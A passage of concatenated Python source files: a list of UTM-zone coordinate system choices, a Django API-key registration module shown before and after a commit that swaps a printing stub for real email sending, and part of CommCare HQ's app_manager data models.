(PSEUDO_MERCATOR, _('Pseudo-Mercator')),
(WGS_72, _('WGS 72')),
(NAD_83, _('NAD 83')),
(OSGB_36, _('OSGB 36')),
)
UTM_ZONE_CHOICES = (
(32601, _('UTM Zone 1, northern hemisphere')),
(32602, _('UTM Zone 2, northern hemisphere')),
(32603, _('UTM Zone 3, northern hemisphere')),
(32604, _('UTM Zone 4, northern hemisphere')),
(32605, _('UTM Zone 5, northern hemisphere')),
(32606, _('UTM Zone 6, northern hemisphere')),
(32607, _('UTM Zone 7, northern hemisphere')),
(32608, _('UTM Zone 8, northern hemisphere')),
(32609, _('UTM Zone 9, northern hemisphere')),
(32610, _('UTM Zone 10, northern hemisphere')),
(32611, _('UTM Zone 11, northern hemisphere')),
(32612, _('UTM Zone 12, northern hemisphere')),
(32613, _('UTM Zone 13, northern hemisphere')),
(32614, _('UTM Zone 14, northern hemisphere')),
(32615, _('UTM Zone 15, northern hemisphere')),
(32616, _('UTM Zone 16, northern hemisphere')),
(32617, _('UTM Zone 17, northern hemisphere')),
(32618, _('UTM Zone 18, northern hemisphere')),
(32619, _('UTM Zone 19, northern hemisphere')),
(32620, _('UTM Zone 20, northern hemisphere')),
(32621, _('UTM Zone 21, northern hemisphere')),
(32622, _('UTM Zone 22, northern hemisphere')),
(32623, _('UTM Zone 23, northern hemisphere')),
(32624, _('UTM Zone 24, northern hemisphere')),
(32625, _('UTM Zone 25, northern hemisphere')),
(32626, _('UTM Zone 26, northern hemisphere')),
(32627, _('UTM Zone 27, northern hemisphere')),
(32628, _('UTM Zone 28, northern hemisphere')),
(32629, _('UTM Zone 29, northern hemisphere')),
(32630, _('UTM Zone 30, northern hemisphere')),
(32631, _('UTM Zone 31, northern hemisphere')),
(32632, _('UTM Zone 32, northern hemisphere')),
(32633, _('UTM Zone 33, northern hemisphere')),
(32634, _('UTM Zone 34, northern hemisphere')),
(32635, _('UTM Zone 35, northern hemisphere')),
(32636, _('UTM Zone 36, northern hemisphere')),
(32637, _('UTM Zone 37, northern hemisphere')),
(32638, _('UTM Zone 38, northern hemisphere')),
(32639, _('UTM Zone 39, northern hemisphere')),
(32640, _('UTM Zone 40, northern hemisphere')),
(32641, _('UTM Zone 41, northern hemisphere')),
(32642, _('UTM Zone 42, northern hemisphere')),
(32643, _('UTM Zone 43, northern hemisphere')),
(32644, _('UTM Zone 44, northern hemisphere')),
(32645, _('UTM Zone 45, northern hemisphere')),
(32646, _('UTM Zone 46, northern hemisphere')),
(32647, _('UTM Zone 47, northern hemisphere')),
(32648, _('UTM Zone 48, northern hemisphere')),
(32649, _('UTM Zone 49, northern hemisphere')),
(32650, _('UTM Zone 50, northern hemisphere')),
(32651, _('UTM Zone 51, northern hemisphere')),
(32652, _('UTM Zone 52, northern hemisphere')),
(32653, _('UTM Zone 53, northern hemisphere')),
(32654, _('UTM Zone 54, northern hemisphere')),
(32655, _('UTM Zone 55, northern hemisphere')),
(32656, _('UTM Zone 56, northern hemisphere')),
(32657, _('UTM Zone 57, northern hemisphere')),
(32658, _('UTM Zone 58, northern hemisphere')),
(32659, _('UTM Zone 59, northern hemisphere')),
(32660, _('UTM Zone 60, northern hemisphere')),
(32701, _('UTM Zone 1, southern hemisphere')),
(32702, _('UTM Zone 2, southern hemisphere')),
(32703, _('UTM Zone 3, southern hemisphere')),
(32704, _('UTM Zone 4, southern hemisphere')),
(32705, _('UTM Zone 5, southern hemisphere')),
(32706, _('UTM Zone 6, southern hemisphere')),
(32707, _('UTM Zone 7, southern hemisphere')),
(32708, _('UTM Zone 8, southern hemisphere')),
(32709, _('UTM Zone 9, southern hemisphere')),
(32710, _('UTM Zone 10, southern hemisphere')),
(32711, _('UTM Zone 11, southern hemisphere')),
(32712, _('UTM Zone 12, southern hemisphere')),
(32713, _('UTM Zone 13, southern hemisphere')),
(32714, _('UTM Zone 14, southern hemisphere')),
(32715, _('UTM Zone 15, southern hemisphere')),
(32716, _('UTM Zone 16, southern hemisphere')),
(32717, _('UTM Zone 17, southern hemisphere')),
(32718, _('UTM Zone 18, southern hemisphere')),
(32719, _('UTM Zone 19, southern hemisphere')),
(32720, _('UTM Zone 20, southern hemisphere')),
(32721, _('UTM Zone 21, southern hemisphere')),
(32722, _('UTM Zone 22, southern hemisphere')),
(32723, _('UTM Zone 23, southern hemisphere')),
(32724, _('UTM Zone 24, southern hemisphere')),
(32725, _('UTM Zone 25, southern hemisphere')),
(32726, _('UTM Zone 26, southern hemisphere')),
(32727, _('UTM Zone 27, southern hemisphere')),
(32728, _('UTM Zone 28, southern hemisphere')),
(32729, _('UTM Zone 29, southern hemisphere')),
(32730, _('UTM Zone 30, southern hemisphere')),
(32731, _('UTM Zone 31, southern hemisphere')),
(32732, _('UTM Zone 32, southern hemisphere')),
(32733, _('UTM Zone 33, southern hemisphere')),
(32734, _('UTM Zone 34, southern hemisphere')),
(32735, _('UTM Zone 35, southern hemisphere')),
(32736, _('UTM Zone 36, southern hemisphere')),
(32737, _('UTM Zone 37, southern hemisphere')),
(32738, _('UTM Zone 38, southern hemisphere')),
(32739, _('UTM Zone 39, southern hemisphere')),
(32740, _('UTM Zone 40, southern hemisphere')),
(32741, _('UTM Zone 41, southern hemisphere')),
(32742, _('UTM Zone 42, southern hemisphere')),
(32743, _('UTM Zone 43, southern hemisphere')),
(32744, _('UTM Zone 44, southern hemisphere')),
(32745, _('UTM Zone 45, southern hemisphere')),
(32746, _('UTM Zone 46, southern hemisphere')),
(32747, _('UTM Zone 47, southern hemisphere')),
(32748, _('UTM Zone 48, southern hemisphere')),
(32749, _('UTM Zone 49, southern hemisphere')),
(32750, _('UTM Zone 50, southern hemisphere')),
(32751, _('UTM Zone 51, southern hemisphere')),
(32752, _('UTM Zone 52, southern hemisphere')),
(32753, _('UTM Zone 53, southern hemisphere')),
(32754, _('UTM Zone 54, southern hemisphere')),
(32755, _('UTM Zone 55, southern hemisphere')),
(32756, _('UTM Zone 56, southern hemisphere')),
(32757, _('UTM Zone 57, southern hemisphere')),
(32758, _('UTM Zone 58, southern hemisphere')),
(32759, _('UTM Zone 59, southern hemisphere')),
(32760, _('UTM Zone 60, southern hemisphere')),
)
CRS_CHOICES = (
(_('Global coordinate reference systems'), GLOBAL_CHOICES),
(_('UTM zones'), UTM_ZONE_CHOICES),
)
|
import uuid
from django.template.loader import render_to_string
from django.shortcuts import render_to_response
from django.conf import settings
from django.forms import ModelForm
from django.conf.urls.defaults import url
from locksmith.common import ApiBase, get_signature
from locksmith.auth.models import Key
def send_mail(title, msg, sender, to):
print title
print msg
print sender
print to
class ApiAuth(ApiBase):
key_model = Key
key_model_form = None
require_confirmation = False
registration_email_subject = 'API Registration'
registration_email_from = settings.DEFAULT_FROM_EMAIL
registration_email_template = 'locksmith/registration_email.txt'
registration_template = 'locksmith/register.html'
registration_complete_template = 'locksmith/registered.html'
registration_confirmed_template = 'locksmith/confirmed.html'
def get_key_model_form(self):
if not self.key_model_form:
class Form(ModelForm):
class Meta:
model = self.key_model
exclude = ('key', 'status', 'issued_on', 'pub_status')
self.key_model_form = Form
return self.key_model_form
def verify_signature(self, post):
return get_signature(post, settings.LOCKSMITH_SIGNING_KEY) == post['signature']
def get_urls(self):
urls = super(ApiAuth, self).get_urls()
return urls + [
url(r'^register/$', self.register, name='api_registration'),
url(r'^confirmkey/(?P<key>[0-9a-f]{32})/$', self.confirm_registration,
name='api_confirm')]
def register(self, request):
if request.method == 'POST':
form = self.get_key_model_form()(request.POST)
if form.is_valid():
newkey = form.save(commit=False)
newkey.key = uuid.uuid4().hex
if self.require_confirmation:
newkey.status = 'U'
else:
newkey.status = 'A'
newkey.save()
email_msg = render_to_string(self.registration_email_template,
{'key': newkey})
send_mail(self.registration_email_subject, email_msg,
self.registration_email_from, [newkey.email])
return render_to_response(self.registration_complete_template,
{'key': newkey})
else:
form = self.get_key_model_form()()
return render_to_response(self.registration_template, {'form':form})
def confirm_registration(self, request, key):
context = {}
try:
context['key'] = key_obj = self.key_model.objects.get(key=key)
if key_obj.status != 'U':
context['error'] = 'Key Already Activated'
else:
key_obj.status = 'A'
key_obj.mark_for_update()
key_obj.save()
except self.key_model.DoesNotExist:
context['error'] = 'Invalid Key'
return render_to_response(self.registration_confirmed_template, context)
real send_mail
import uuid
from django.conf import settings
from django.conf.urls.defaults import url
from django.core.mail import send_mail
from django.forms import ModelForm
from django.shortcuts import render_to_response
from django.template.loader import render_to_string
from locksmith.common import ApiBase, get_signature
from locksmith.auth.models import Key
class ApiAuth(ApiBase):
key_model = Key
key_model_form = None
require_confirmation = False
registration_email_subject = 'API Registration'
registration_email_from = settings.DEFAULT_FROM_EMAIL
registration_email_template = 'locksmith/registration_email.txt'
registration_template = 'locksmith/register.html'
registration_complete_template = 'locksmith/registered.html'
registration_confirmed_template = 'locksmith/confirmed.html'
def get_key_model_form(self):
if not self.key_model_form:
class Form(ModelForm):
class Meta:
model = self.key_model
exclude = ('key', 'status', 'issued_on', 'pub_status')
self.key_model_form = Form
return self.key_model_form
def verify_signature(self, post):
return get_signature(post, settings.LOCKSMITH_SIGNING_KEY) == post['signature']
def get_urls(self):
urls = super(ApiAuth, self).get_urls()
return urls + [
url(r'^register/$', self.register, name='api_registration'),
url(r'^confirmkey/(?P<key>[0-9a-f]{32})/$', self.confirm_registration,
name='api_confirm')]
def register(self, request):
if request.method == 'POST':
form = self.get_key_model_form()(request.POST)
if form.is_valid():
newkey = form.save(commit=False)
newkey.key = uuid.uuid4().hex
if self.require_confirmation:
newkey.status = 'U'
else:
newkey.status = 'A'
newkey.save()
email_msg = render_to_string(self.registration_email_template,
{'key': newkey})
send_mail(self.registration_email_subject, email_msg,
self.registration_email_from, [newkey.email])
return render_to_response(self.registration_complete_template,
{'key': newkey})
else:
form = self.get_key_model_form()()
return render_to_response(self.registration_template, {'form':form})
def confirm_registration(self, request, key):
context = {}
try:
context['key'] = key_obj = self.key_model.objects.get(key=key)
if key_obj.status != 'U':
context['error'] = 'Key Already Activated'
else:
key_obj.status = 'A'
key_obj.mark_for_update()
key_obj.save()
except self.key_model.DoesNotExist:
context['error'] = 'Invalid Key'
return render_to_response(self.registration_confirmed_template, context)
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import unicode_literals
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple, Counter
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from io import BytesIO
import qrcode
from django.utils.safestring import SafeBytes
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from django.utils.translation import ugettext_lazy
from django.db import models
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.app_schemas.case_properties import (
get_all_case_properties,
get_parent_type_map,
get_usercase_properties,
)
from corehq.apps.app_manager.detail_screen import PropertyXpathGenerator
from corehq.apps.integration.models import ApplicationIntegrationMixin
from corehq.apps.linked_domain.applications import get_master_app_version, get_latest_master_app_release
from corehq.apps.app_manager.helpers.validators import (
ApplicationBaseValidator,
ApplicationValidator,
FormValidator,
FormBaseValidator,
IndexedFormBaseValidator,
ModuleValidator,
ModuleBaseValidator,
AdvancedModuleValidator,
AdvancedFormValidator,
ReportModuleValidator,
ShadowFormValidator,
ShadowModuleValidator,
)
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.data_dictionary.util import get_case_property_description_dict
from corehq.apps.linked_domain.exceptions import ActionNotPermitted
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from corehq.apps.userreports.util import get_static_report_mapping
from corehq.apps.users.dbaccessors.couch_users import get_display_name_for_user_id
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.timer import TimingContext, time_method
from corehq.util.timezones.utils import get_timezone_for_domain
from dimagi.ext.couchdbkit import (
BooleanProperty,
DateTimeProperty,
DecimalProperty,
DictProperty,
Document,
DocumentSchema,
FloatProperty,
IntegerProperty,
ListProperty,
SchemaDictProperty,
SchemaListProperty,
SchemaProperty,
StringListProperty,
StringProperty,
)
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.urls import reverse
from django.template.loader import render_to_string
from couchdbkit import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin, CODES
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.apps.app_manager.tasks import prune_auto_generated_builds
from corehq.util.quickcache import quickcache
from corehq.util.soft_assert import soft_assert
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.const import USERCASE_TYPE
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
)
from corehq.apps.builds.utils import get_default_build_spec
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from memoized import memoized
from dimagi.utils.web import get_url_base, parse_int
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import (
ApplicationMediaMixin,
CommCareMultimedia,
FormMediaMixin,
ModuleMediaMixin,
)
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
save_xform,
is_usercase_in_use,
actions_use_usercase,
update_form_unique_ids,
get_correct_app_class,
get_and_assert_practice_user_in_domain,
LatestAppInfo,
update_report_module_ids,
module_offers_search,
get_latest_enabled_build_for_profile,
get_latest_enabled_versions_per_profile,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from corehq.apps.app_manager.exceptions import (
AppEditingError,
FormNotFoundException,
IncompatibleFormTypeException,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
XFormValidationFailed,
PracticeUserException)
from corehq.apps.reports.daterange import get_daterange_start_end_dates, get_simple_dateranges
from jsonpath_rw import jsonpath, parse
import six
from six.moves import filter
from six.moves import range
from six.moves import map
from io import open
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
FIELD_SEPARATOR = ':'
ATTACHMENT_REGEX = r'[^/]*\.xml'
ANDROID_LOGO_PROPERTY_MAPPING = {
'hq_logo_android_home': 'brand-banner-home',
'hq_logo_android_login': 'brand-banner-login',
'hq_logo_android_demo': 'brand-banner-home-demo',
}
LATEST_APK_VALUE = 'latest'
LATEST_APP_VALUE = 0
_soft_assert = soft_assert(to="{}@{}.com".format('npellegrino', 'dimagi'), exponential_backoff=True)
def jsonpath_update(datum_context, value):
field = datum_context.path.fields[0]
parent = jsonpath.Parent().find(datum_context)[0]
parent.value[field] = value
# store a list of references to form ID's so that
# when an app is copied we can update the references
# with the new values
form_id_references = []
def FormIdProperty(expression, **kwargs):
"""
Create a StringProperty that references a form ID. This is necessary because
form IDs change when apps are copied so we need to make sure we update
any references to the them.
:param expression: jsonpath expression that can be used to find the field
:param kwargs: arguments to be passed to the underlying StringProperty
"""
path_expression = parse(expression)
assert isinstance(path_expression, jsonpath.Child), "only child path expressions are supported"
field = path_expression.right
assert len(field.fields) == 1, 'path expression can only reference a single field'
form_id_references.append(path_expression)
return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
def app_template_dir(slug):
return os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'template_apps', slug)
@memoized
def load_app_template(slug):
with open(os.path.join(app_template_dir(slug), 'app.json')) as f:
return json.load(f)
class IndexedSchema(DocumentSchema):
"""
Abstract class.
Meant for documents that appear in a list within another document
and need to know their own position within that list.
"""
def with_id(self, i, parent):
self._i = i
self._parent = parent
return self
@property
def id(self):
return self._i
def __eq__(self, other):
return (
other and isinstance(other, IndexedSchema)
and (self.id == other.id)
and (self._parent == other._parent)
)
class Getter(object):
def __init__(self, attr):
self.attr = attr
def __call__(self, instance):
items = getattr(instance, self.attr)
l = len(items)
for i, item in enumerate(items):
yield item.with_id(i % l, instance)
def __get__(self, instance, owner):
# thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
# this makes Getter('foo') act like a bound method
return types.MethodType(self, instance)
class FormActionCondition(DocumentSchema):
"""
The condition under which to open/update/close a case/referral
Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
in which case the action takes place if question has answer answer,
or {'type': 'always'} in which case the action always takes place.
"""
type = StringProperty(choices=["if", "always", "never"], default="never")
question = StringProperty()
answer = StringProperty()
operator = StringProperty(choices=['=', 'selected', 'boolean_true'], default='=')
def is_active(self):
return self.type in ('if', 'always')
class FormAction(DocumentSchema):
"""
Corresponds to Case XML
"""
condition = SchemaProperty(FormActionCondition)
def is_active(self):
return self.condition.is_active()
@classmethod
def get_action_paths(cls, action):
if action.condition.type == 'if':
yield action.condition.question
for __, path in cls.get_action_properties(action):
yield path
@classmethod
def get_action_properties(self, action):
action_properties = action.properties()
if 'name_path' in action_properties and action.name_path:
yield 'name', action.name_path
if 'case_name' in action_properties:
yield 'name', action.case_name
if 'external_id' in action_properties and action.external_id:
yield 'external_id', action.external_id
if 'update' in action_properties:
for name, path in action.update.items():
yield name, path
if 'case_properties' in action_properties:
for name, path in action.case_properties.items():
yield name, path
if 'preload' in action_properties:
for path, name in action.preload.items():
yield name, path
class UpdateCaseAction(FormAction):
update = DictProperty()
class PreloadAction(FormAction):
preload = DictProperty()
def is_active(self):
return bool(self.preload)
class UpdateReferralAction(FormAction):
followup_date = StringProperty()
def get_followup_date(self):
if self.followup_date:
return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
followup_date=self.followup_date,
)
return self.followup_date or "date(today() + 2)"
class OpenReferralAction(UpdateReferralAction):
name_path = StringProperty()
class OpenCaseAction(FormAction):
name_path = StringProperty()
external_id = StringProperty()
class OpenSubCaseAction(FormAction, IndexedSchema):
case_type = StringProperty()
case_name = StringProperty()
reference_id = StringProperty()
case_properties = DictProperty()
repeat_context = StringProperty()
# relationship = "child" for index to a parent case (default)
# relationship = "extension" for index to a host case
relationship = StringProperty(choices=['child', 'extension'], default='child')
close_condition = SchemaProperty(FormActionCondition)
@property
def form_element_name(self):
return 'subcase_{}'.format(self.id)
class FormActions(DocumentSchema):
open_case = SchemaProperty(OpenCaseAction)
update_case = SchemaProperty(UpdateCaseAction)
close_case = SchemaProperty(FormAction)
open_referral = SchemaProperty(OpenReferralAction)
update_referral = SchemaProperty(UpdateReferralAction)
close_referral = SchemaProperty(FormAction)
case_preload = SchemaProperty(PreloadAction)
referral_preload = SchemaProperty(PreloadAction)
load_from_form = SchemaProperty(PreloadAction) # DEPRECATED
usercase_update = SchemaProperty(UpdateCaseAction)
usercase_preload = SchemaProperty(PreloadAction)
subcases = SchemaListProperty(OpenSubCaseAction)
get_subcases = IndexedSchema.Getter('subcases')
def all_property_names(self):
names = set()
names.update(list(self.update_case.update.keys()))
names.update(list(self.case_preload.preload.values()))
for subcase in self.subcases:
names.update(list(subcase.case_properties.keys()))
return names
def count_subcases_per_repeat_context(self):
return Counter([action.repeat_context for action in self.subcases])
class CaseIndex(DocumentSchema):
tag = StringProperty()
reference_id = StringProperty(default='parent')
relationship = StringProperty(choices=['child', 'extension', 'question'], default='child')
# if relationship is 'question', this is the question path
# question's response must be either "child" or "extension"
relationship_question = StringProperty(default='')
class AdvancedAction(IndexedSchema):
case_type = StringProperty()
case_tag = StringProperty()
case_properties = DictProperty()
# case_indices = NotImplemented
close_condition = SchemaProperty(FormActionCondition)
__eq__ = DocumentSchema.__eq__
def get_paths(self):
for path in self.case_properties.values():
yield path
if self.close_condition.type == 'if':
yield self.close_condition.question
def get_property_names(self):
return set(self.case_properties.keys())
@property
def is_subcase(self):
return bool(self.case_indices)
@property
def form_element_name(self):
return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
"""
Configuration for auto-selecting a case.
Attributes:
value_source Reference to the source of the value. For mode = fixture,
this represents the FixtureDataType ID. For mode = case
this represents the 'case_tag' for the case.
The modes 'user' and 'raw' don't require a value_source.
value_key The actual field that contains the case ID. Can be a case
index or a user data key or a fixture field name or the raw
xpath expression.
"""
mode = StringProperty(choices=[AUTO_SELECT_USER,
AUTO_SELECT_FIXTURE,
AUTO_SELECT_CASE,
AUTO_SELECT_USERCASE,
AUTO_SELECT_RAW])
value_source = StringProperty()
value_key = StringProperty(required=True)
class LoadCaseFromFixture(DocumentSchema):
"""
fixture_nodeset: nodeset that returns the fixture options to display
fixture_tag: id of session datum where the result of user selection will be stored
fixture_variable: value from the fixture to store from the selection
auto_select_fixture: boolean to autoselect the value if the nodeset only returns 1 result
case_property: case property to filter on
arbitrary_datum_*: adds an arbitrary datum with function before the action
"""
fixture_nodeset = StringProperty()
fixture_tag = StringProperty()
fixture_variable = StringProperty()
auto_select_fixture = BooleanProperty(default=False)
case_property = StringProperty(default='')
auto_select = BooleanProperty(default=False)
arbitrary_datum_id = StringProperty()
arbitrary_datum_function = StringProperty()
class LoadUpdateAction(AdvancedAction):
"""
details_module: Use the case list configuration from this module to show the cases.
preload: Value from the case to load into the form. Keys are question paths,
values are case properties.
auto_select: Configuration for auto-selecting the case
load_case_from_fixture: Configuration for loading a case using fixture data
show_product_stock: If True list the product stock using the module's Product List
configuration.
product_program: Only show products for this CommCare Supply program.
case_index: Used when a case should be created/updated as a child or extension case
of another case.
"""
details_module = StringProperty()
preload = DictProperty()
auto_select = SchemaProperty(AutoSelectCase, default=None)
load_case_from_fixture = SchemaProperty(LoadCaseFromFixture, default=None)
show_product_stock = BooleanProperty(default=False)
product_program = StringProperty()
case_index = SchemaProperty(CaseIndex)
@property
def case_indices(self):
# Allows us to ducktype AdvancedOpenCaseAction
return [self.case_index] if self.case_index.tag else []
@case_indices.setter
def case_indices(self, value):
if len(value) > 1:
raise ValueError('A LoadUpdateAction cannot have more than one case index')
if value:
self.case_index = value[0]
else:
self.case_index = CaseIndex()
@case_indices.deleter
def case_indices(self):
self.case_index = CaseIndex()
def get_paths(self):
for path in super(LoadUpdateAction, self).get_paths():
yield path
for path in self.preload.keys():
yield path
def get_property_names(self):
names = super(LoadUpdateAction, self).get_property_names()
names.update(list(self.preload.values()))
return names
@property
def case_session_var(self):
return 'case_id_{0}'.format(self.case_tag)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
data['case_index'] = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
name_path = StringProperty()
repeat_context = StringProperty()
case_indices = SchemaListProperty(CaseIndex)
open_condition = SchemaProperty(FormActionCondition)
def get_paths(self):
for path in super(AdvancedOpenCaseAction, self).get_paths():
yield path
yield self.name_path
if self.open_condition.type == 'if':
yield self.open_condition.question
@property
def case_session_var(self):
return 'case_id_new_{}_{}'.format(self.case_type, self.id)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
index = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
if hasattr(data.get('case_indices'), 'append'):
data['case_indices'].append(index)
else:
data['case_indices'] = [index]
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
load_update_cases = SchemaListProperty(LoadUpdateAction)
open_cases = SchemaListProperty(AdvancedOpenCaseAction)
get_load_update_actions = IndexedSchema.Getter('load_update_cases')
get_open_actions = IndexedSchema.Getter('open_cases')
def get_all_actions(self):
return itertools.chain(self.get_load_update_actions(), self.get_open_actions())
def get_subcase_actions(self):
return (a for a in self.get_all_actions() if a.case_indices)
def get_open_subcase_actions(self, parent_case_type=None):
for action in self.open_cases:
if action.case_indices:
if not parent_case_type:
yield action
else:
if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
for case_index in action.case_indices):
yield action
def get_case_tags(self):
for action in self.get_all_actions():
yield action.case_tag
def get_action_from_tag(self, tag):
return self.actions_meta_by_tag.get(tag, {}).get('action', None)
@property
def actions_meta_by_tag(self):
return self._action_meta()['by_tag']
@property
def actions_meta_by_parent_tag(self):
return self._action_meta()['by_parent_tag']
@property
def auto_select_actions(self):
return self._action_meta()['by_auto_select_mode']
@memoized
def _action_meta(self):
meta = {
'by_tag': {},
'by_parent_tag': {},
'by_auto_select_mode': {
AUTO_SELECT_USER: [],
AUTO_SELECT_CASE: [],
AUTO_SELECT_FIXTURE: [],
AUTO_SELECT_USERCASE: [],
AUTO_SELECT_RAW: [],
}
}
def add_actions(type, action_list):
for action in action_list:
meta['by_tag'][action.case_tag] = {
'type': type,
'action': action
}
for parent in action.case_indices:
meta['by_parent_tag'][parent.tag] = {
'type': type,
'action': action
}
if type == 'load' and action.auto_select and action.auto_select.mode:
meta['by_auto_select_mode'][action.auto_select.mode].append(action)
add_actions('load', self.get_load_update_actions())
add_actions('open', self.get_open_actions())
return meta
def count_subcases_per_repeat_context(self):
return Counter([action.repeat_context for action in self.get_open_subcase_actions()])
class FormSource(object):
def __get__(self, form, form_cls):
if not form:
return self
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
# for backwards compatibility of really old apps
try:
old_contents = form['contents']
except AttributeError:
pass
else:
app.lazy_put_attachment(old_contents.encode('utf-8'), filename)
del form['contents']
if not app.has_attachment(filename):
source = ''
else:
source = app.lazy_fetch_attachment(filename)
if isinstance(source, bytes):
source = source.decode('utf-8')
else:
_soft_assert(False, type(source))
return source
def __set__(self, form, value):
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
if isinstance(value, six.text_type):
value = value.encode('utf-8')
else:
_soft_assert(False, type(value))
app.lazy_put_attachment(value, filename)
form.clear_validation_cache()
try:
form.xmlns = form.wrapped_xform().data_node.tag_xmlns
except Exception:
form.xmlns = None
class CachedStringProperty(object):
def __init__(self, key):
self.get_key = key
def __get__(self, instance, owner):
return self.get(self.get_key(instance))
def __set__(self, instance, value):
self.set(self.get_key(instance), value)
@classmethod
def get(cls, key):
return cache.get(key)
@classmethod
def set(cls, key, value):
cache.set(key, value, 7*24*60*60) # cache for 7 days
class ScheduleVisit(IndexedSchema):
"""
due: Days after the anchor date that this visit is due
starts: Days before the due date that this visit is valid from
expires: Days after the due date that this visit is valid until (optional)
repeats: Whether this is a repeat visit (one per form allowed)
increment: Days after the last visit that the repeat visit occurs
"""
due = IntegerProperty()
starts = IntegerProperty()
expires = IntegerProperty()
repeats = BooleanProperty(default=False)
increment = IntegerProperty()
@property
def id(self):
"""Visits are 1-based indexed"""
_id = super(ScheduleVisit, self).id
return _id + 1
class FormDatum(DocumentSchema):
name = StringProperty()
xpath = StringProperty()
class FormLink(DocumentSchema):
"""
xpath: xpath condition that must be true in order to open next form
form_id: id of next form to open
"""
xpath = StringProperty()
form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
"""
starts: Days after the anchor date that this schedule starts
expires: Days after the anchor date that this schedule expires (optional)
visits: List of visits in this schedule
allow_unscheduled: Allow unscheduled visits in this schedule
transition_condition: Condition under which we transition to the next phase
termination_condition: Condition under which we terminate the whole schedule
"""
enabled = BooleanProperty(default=True)
starts = IntegerProperty()
expires = IntegerProperty()
allow_unscheduled = BooleanProperty(default=False)
visits = SchemaListProperty(ScheduleVisit)
get_visits = IndexedSchema.Getter('visits')
transition_condition = SchemaProperty(FormActionCondition)
termination_condition = SchemaProperty(FormActionCondition)
class CustomAssertion(DocumentSchema):
"""Custom assertions to add to the assertions block
test: The actual assertion to run
locale_id: The id of the localizable string
"""
test = StringProperty(required=True)
text = DictProperty(StringProperty)
class CustomInstance(DocumentSchema):
"""Custom instances to add to the instance block
instance_id: The ID of the instance
instance_path: The path where the instance can be found
"""
instance_id = StringProperty(required=True)
instance_path = StringProperty(required=True)
class CommentMixin(DocumentSchema):
"""
Documentation comment for app builders and maintainers
"""
comment = StringProperty(default='')
@property
def short_comment(self):
"""
Trim comment to 500 chars (about 100 words)
"""
return self.comment if len(self.comment) <= 500 else self.comment[:497] + '...'
class CaseLoadReference(DocumentSchema):
"""
This is the schema for a load reference that is used in validation and expected
to be worked with when using `CaseReferences`. The format is different from the
dict of:
{
'path': ['list', 'of', 'properties']
}
That is stored on the model and expected in Vellum, but as we add more information
(like case types) to the load model this format will be easier to extend.
"""
_allow_dynamic_properties = False
path = StringProperty()
properties = ListProperty(six.text_type)
